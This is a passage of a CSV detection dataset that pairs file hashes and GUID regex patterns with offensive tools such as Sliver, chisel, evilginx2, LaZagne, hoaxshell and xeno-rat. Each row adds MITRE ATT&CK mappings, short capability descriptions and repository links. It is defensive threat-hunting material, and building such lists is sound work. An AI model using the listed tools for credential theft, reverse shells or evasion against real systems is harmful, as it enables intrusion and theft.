Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*8aac7bb51d605351a79f988d1b1772ae94d4b8ab4622118259effad125719e99*",".{0,1000}8aac7bb51d605351a79f988d1b1772ae94d4b8ab4622118259effad125719e99.{0,1000}","offensive_tool_keyword","evilginx2","Standalone 
man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*8aba74be7acef3c84cef0163411298aa994872347a4ac84cc0a0d19ddf0eb65c*",".{0,1000}8aba74be7acef3c84cef0163411298aa994872347a4ac84cc0a0d19ddf0eb65c.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","0","N/A","8","1","47","7","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z" "*8ac384fed6ad25cb08874eb3dc9b45c80084fa5518ec5a7fa79e3f5d5e40b66e*",".{0,1000}8ac384fed6ad25cb08874eb3dc9b45c80084fa5518ec5a7fa79e3f5d5e40b66e.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*8ae33d1da163dd41ff4bfe07f9b290d6fa2a46b592735ec9734477534760ea5e*",".{0,1000}8ae33d1da163dd41ff4bfe07f9b290d6fa2a46b592735ec9734477534760ea5e.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*8b081e47fc6d4ab5dc0483dcc7243ff66911b9e660ab8ad9296a7144e95dbd47*",".{0,1000}8b081e47fc6d4ab5dc0483dcc7243ff66911b9e660ab8ad9296a7144e95dbd47.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*8b181b6d9004ec5341ed9adeaaf5f43ece0479da86687e7f3e70788d282df356*",".{0,1000}8b181b6d9004ec5341ed9adeaaf5f43ece0479da86687e7f3e70788d282df356.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8b30d6cf12fb57cfd41dd6a41b5f16b04642a019ae57074a4f884a8d5f97699c*",".{0,1000}8b30d6cf12fb57cfd41dd6a41b5f16b04642a019ae57074a4f884a8d5f97699c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*8b3dc5f7f95e60cc22e2e41bf2c000c3ab16983493bae2427b92f984147de598*",".{0,1000}8b3dc5f7f95e60cc22e2e41bf2c000c3ab16983493bae2427b92f984147de598.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*8b41d9f80065f1bdcef489969e314c71f6f36265f6b6b5250a90608b9f393cdb*",".{0,1000}8b41d9f80065f1bdcef489969e314c71f6f36265f6b6b5250a90608b9f393cdb.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - 
T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*8b4cb728e2db083daf0b42a3d3e6982e161ba42f90264e6da1508800e4b4d394*",".{0,1000}8b4cb728e2db083daf0b42a3d3e6982e161ba42f90264e6da1508800e4b4d394.{0,1000}","offensive_tool_keyword","spoofing-office-macro","PoC of a VBA macro spawning a process with a spoofed parent and command line","T1055.011 - T1127 - T1077","TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/christophetd/spoofing-office-macro","1","0","N/A","9","4","371","86","2020-04-28T16:23:43Z","2019-03-11T18:23:39Z" "*8b4da3fc66c36752ab032c8d57a0df7caa530d07c3e9847582ff2d792768ff12*",".{0,1000}8b4da3fc66c36752ab032c8d57a0df7caa530d07c3e9847582ff2d792768ff12.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*8b53f3b214e31f24b635bc45651cf7004da4718cb0b8c844d27836153711da3d*",".{0,1000}8b53f3b214e31f24b635bc45651cf7004da4718cb0b8c844d27836153711da3d.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*8B605B2E-AAD2-46FB-A348-27E3AABA4C9C*",".{0,1000}8B605B2E\-AAD2\-46FB\-A348\-27E3AABA4C9C.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*8ba2d0dc05dc4a81e064e9bf70eb3681f661b026c7daec1433fb8dad4b9d8a1f*",".{0,1000}8ba2d0dc05dc4a81e064e9bf70eb3681f661b026c7daec1433fb8dad4b9d8a1f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*8ba79d96e4337be960e4dd1ce94a622c08391da243fee05a44d303de46f9ae93*",".{0,1000}8ba79d96e4337be960e4dd1ce94a622c08391da243fee05a44d303de46f9ae93.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8BAAEFF6-1840-4430-AA05-47F2877E3235*",".{0,1000}8BAAEFF6\-1840\-4430\-AA05\-47F2877E3235.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*8bb972b4dc7e0c5b8db0be349ecf62043e69ea1273d5298f8e55c02fa047712c*",".{0,1000}8bb972b4dc7e0c5b8db0be349ecf62043e69ea1273d5298f8e55c02fa047712c.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" 
"*8BbApiMBHsPVKkLEP4rVbST6CnSb3LW2gXygngCi5MGiBuwAFh6bFEzT3UTufiCehFK7fNvAjs5Tv6BKYa6w8hwaSjnsg2N.*",".{0,1000}8BbApiMBHsPVKkLEP4rVbST6CnSb3LW2gXygngCi5MGiBuwAFh6bFEzT3UTufiCehFK7fNvAjs5Tv6BKYa6w8hwaSjnsg2N\..{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*8bc3958a70372ecaeba0b81e287692297974848cc2ecf053ea7ebb9dfcc933f8*",".{0,1000}8bc3958a70372ecaeba0b81e287692297974848cc2ecf053ea7ebb9dfcc933f8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8bce6c99c0ac4b8d76c49f6e4dece996b77bb7d71d9acdbfcf5b0460811adfb9*",".{0,1000}8bce6c99c0ac4b8d76c49f6e4dece996b77bb7d71d9acdbfcf5b0460811adfb9.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" 
"*8BF82BBE-909C-4777-A2FC-EA7C070FF43E*",".{0,1000}8BF82BBE\-909C\-4777\-A2FC\-EA7C070FF43E.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*8c1007a1d0abce7187cc43079832d6b2b9510aee7c15e1eb2f322d8cc854cf3b*",".{0,1000}8c1007a1d0abce7187cc43079832d6b2b9510aee7c15e1eb2f322d8cc854cf3b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8c34fc93d2e71f3faeaa17b1507a70d87e09ec7bafd7922dff22ba887c304db5*",".{0,1000}8c34fc93d2e71f3faeaa17b1507a70d87e09ec7bafd7922dff22ba887c304db5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8c484c384d66dd2821b9f1d4f963ae897fbf539b2ab495f3e93344635eb76f18*",".{0,1000}8c484c384d66dd2821b9f1d4f963ae897fbf539b2ab495f3e93344635eb76f18.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*8c71bcc0680bd7c69fd58639a6748d26202caab6d639f9b92eb394e6648bce0e*",".{0,1000}8c71bcc0680bd7c69fd58639a6748d26202caab6d639f9b92eb394e6648bce0e.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*8c7bda923eb22fbe0961f2bb9585ceaac8e0c447116ec87979ae44b6a2699ac1*",".{0,1000}8c7bda923eb22fbe0961f2bb9585ceaac8e0c447116ec87979ae44b6a2699ac1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - 
TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*8c7d64cec00aafa23884f1bb28337ef6ce49f2f90605800217f635526e38541d*",".{0,1000}8c7d64cec00aafa23884f1bb28337ef6ce49f2f90605800217f635526e38541d.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","N/A","8","2","130","24","2024-03-17T04:43:11Z","2024-03-15T16:54:49Z" "*8c936f3b5bcd9dbb20a4d0602cdf26fbf3efe681134f20e510acda6561526623*",".{0,1000}8c936f3b5bcd9dbb20a4d0602cdf26fbf3efe681134f20e510acda6561526623.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8cb1ea0098cf975a1ad6d61b2a387f8acf09ef8576ea836f838aa6ac9c0fb0fb*",".{0,1000}8cb1ea0098cf975a1ad6d61b2a387f8acf09ef8576ea836f838aa6ac9c0fb0fb.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*8cb79a0a047793ff81319d7e4999732f8fcc49fbb2ba76f9ac38abf988c3eed8*",".{0,1000}8cb79a0a047793ff81319d7e4999732f8fcc49fbb2ba76f9ac38abf988c3eed8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*8ccc989ac8dfc5453a486361a7850f1add7e2f7dfe4016840671e8c183ed887a*",".{0,1000}8ccc989ac8dfc5453a486361a7850f1add7e2f7dfe4016840671e8c183ed887a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*8cd0ff4a46caae1508aaa14d69ac3393f05d2e58a1fd94d8c8b45a3ed6a6a474*",".{0,1000}8cd0ff4a46caae1508aaa14d69ac3393f05d2e58a1fd94d8c8b45a3ed6a6a474.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*8d013a3cd78fc557c13657fbdf62382cace60d05dc73868184db4a5573bca34e*",".{0,1000}8d013a3cd78fc557c13657fbdf62382cace60d05dc73868184db4a5573bca34e.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*8d0cbb7280381d6847295ae41a30dd19afb7a27141b95918561e52dbcc458182*",".{0,1000}8d0cbb7280381d6847295ae41a30dd19afb7a27141b95918561e52dbcc458182.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*8d0dac6d636eb3acfab0fd50442a8d404251266bcaf175eb4c119917e7ba32bc*",".{0,1000}8d0dac6d636eb3acfab0fd50442a8d404251266bcaf175eb4c119917e7ba32bc.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open 
source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*8d1f3e17106324aad99a98f5dd921db9d27a620b37cadc06a4c470f4404dfca2*",".{0,1000}8d1f3e17106324aad99a98f5dd921db9d27a620b37cadc06a4c470f4404dfca2.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*8d246f76d57dfa40f287d6d37f3a43c343b67c5db31f728d4568f2d8ed2d2799*",".{0,1000}8d246f76d57dfa40f287d6d37f3a43c343b67c5db31f728d4568f2d8ed2d2799.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8d2b6767f4a99a2bf89c412dd27424aeaf9f79ccd0640ab1257168c895c85f36*",".{0,1000}8d2b6767f4a99a2bf89c412dd27424aeaf9f79ccd0640ab1257168c895c85f36.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8d3129341c603fa22b052f925fdf3bef054327c081299140d3c484f76254ca87*",".{0,1000}8d3129341c603fa22b052f925fdf3bef054327c081299140d3c484f76254ca87.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8d3945448815d156c064445585aa7cf51a5c30e9f96d7598e8ca323815f9aee3*",".{0,1000}8d3945448815d156c064445585aa7cf51a5c30e9f96d7598e8ca323815f9aee3.{0,1000}","offensive_tool_keyword","Invoke-WMIpersist","A powershell script to create WMI Event subscription persistence","T1546.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/bspence7337/Invoke-WMIpersist","1","0","N/A","10","1","7","0","2018-05-18T16:42:52Z","2017-11-02T03:47:25Z" "*8d87231f69d0fdeb63b10141cba62e31cc0fb16a105fda66fbd77f06e9d98feb*",".{0,1000}8d87231f69d0fdeb63b10141cba62e31cc0fb16a105fda66fbd77f06e9d98feb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*8dacc97038a845b73c4f156f3fb4d00ef5b4cfa7a8e6b10e0bd8e5c918d62fd1*",".{0,1000}8dacc97038a845b73c4f156f3fb4d00ef5b4cfa7a8e6b10e0bd8e5c918d62fd1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8dca31ac3cffeacb63b9f572bb9f4b53481e51d1d74269168834c395725f0b6e*",".{0,1000}8dca31ac3cffeacb63b9f572bb9f4b53481e51d1d74269168834c395725f0b6e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*8dd0633df72aacd10c634a263f6b1ade7195508e79993681e0800527ddfd86ef*",".{0,1000}8dd0633df72aacd10c634a263f6b1ade7195508e79993681e0800527ddfd86ef.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" 